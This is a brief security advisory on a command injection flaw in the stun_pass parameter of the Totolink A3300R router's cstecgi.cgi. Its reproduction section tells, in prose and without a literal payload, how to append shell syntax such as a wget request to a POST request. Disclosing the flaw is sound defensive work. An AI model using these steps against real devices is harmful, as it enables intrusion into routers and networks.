Totolink A3300R OS Command Injection Vulnerability

A command injection vulnerability has been identified in the Totolink A3300R router, specifically in version 17.0.0cu.557_B20221024. The issue arises in the function vsetTr069Cfg within the file /cgi-bin/cstecgi.cgi. The vulnerability is triggered by manipulating the stun_pass parameter, which is improperly sanitized before being passed to a command execution function. This flaw allows authenticated attackers to inject and execute arbitrary operating system commands on the device.

Impact

Exploitation of this vulnerability allows for arbitrary command execution on the affected device.

Reproduction

To reproduce this vulnerability, send a POST request to /cgi-bin/cstecgi.cgi with the stun_pass parameter included in the request body. The value of the stun_pass parameter should be crafted to include shell command syntax, which will be executed on the device's operating system. This can be done by appending a command, such as a wget request, to the stun_pass value. Once the request is processed, the injected command will be executed, demonstrating the command injection vulnerability.